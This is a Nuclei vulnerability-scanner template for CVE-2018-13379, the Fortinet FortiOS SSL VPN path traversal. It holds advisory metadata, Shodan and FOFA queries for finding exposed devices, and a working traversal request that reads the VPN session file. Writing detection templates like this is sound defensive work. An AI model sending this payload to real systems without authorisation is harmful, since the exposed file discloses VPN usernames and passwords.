nuclei-templates/http/cves/2018/CVE-2018-13379.yaml

49 lines
1.9 KiB
YAML
Raw Normal View History

2021-01-02 05:00:39 +00:00
id: CVE-2018-13379
2020-04-22 06:42:01 +00:00
info:
name: Fortinet FortiOS - Credentials Disclosure
2020-04-22 06:42:01 +00:00
author: organiccrap
severity: critical
description: Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.3 to 5.6.7 and 5.4.6 to 5.4.12 and FortiProxy 2.0.0, 1.2.0 to 1.2.8, 1.1.0 to 1.1.6, 1.0.0 to 1.0.7 under SSL VPN web portal allows an unauthenticated attacker to download system files via special crafted HTTP resource requests due to improper limitation of a pathname to a restricted directory (path traversal).
2023-09-27 15:51:13 +00:00
impact: |
An attacker can obtain sensitive information such as usernames and passwords.
2023-09-06 12:57:14 +00:00
remediation: |
Apply the necessary patches or updates provided by Fortinet to fix the vulnerability.
reference:
- https://fortiguard.com/advisory/FG-IR-18-384
- https://www.fortiguard.com/psirt/FG-IR-20-233
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13379
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2018-13379
cwe-id: CWE-22
epss-score: 0.97305
epss-percentile: 0.99854
2023-09-06 12:57:14 +00:00
cpe: cpe:2.3:o:fortinet:fortios:*:*:*:*:*:*:*:*
2022-06-25 07:48:45 +00:00
metadata:
verified: true
2023-09-06 12:57:14 +00:00
max-request: 1
2023-07-11 19:49:27 +00:00
vendor: fortinet
product: fortios
shodan-query:
- http.html:"/remote/login" "xxxxxxxx"
- http.favicon.hash:945408572
- cpe:"cpe:2.3:o:fortinet:fortios"
- port:10443 http.favicon.hash:945408572
fofa-query:
- body="/remote/login" "xxxxxxxx"
- icon_hash=945408572
2024-01-14 09:21:50 +00:00
tags: cve2018,cve,fortios,lfi,kev,fortinet
2020-04-22 06:42:01 +00:00
http:
2020-04-22 06:42:01 +00:00
- method: GET
2020-05-25 07:49:06 +00:00
path:
- "{{BaseURL}}/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession"
2022-06-25 07:48:45 +00:00
matchers:
- type: regex
part: body
regex:
- '^var fgt_lang ='
# digest: 490a0046304402206482ae29d2120aa7fa2f03b1c2d264568d1de71b049017f1b396a8237e3cd26502205f50509a64af57b118aa81d4dc221975d88602bde5b9038c06abd4a228ce9770:922c64590222798bb761d5b6d8e72950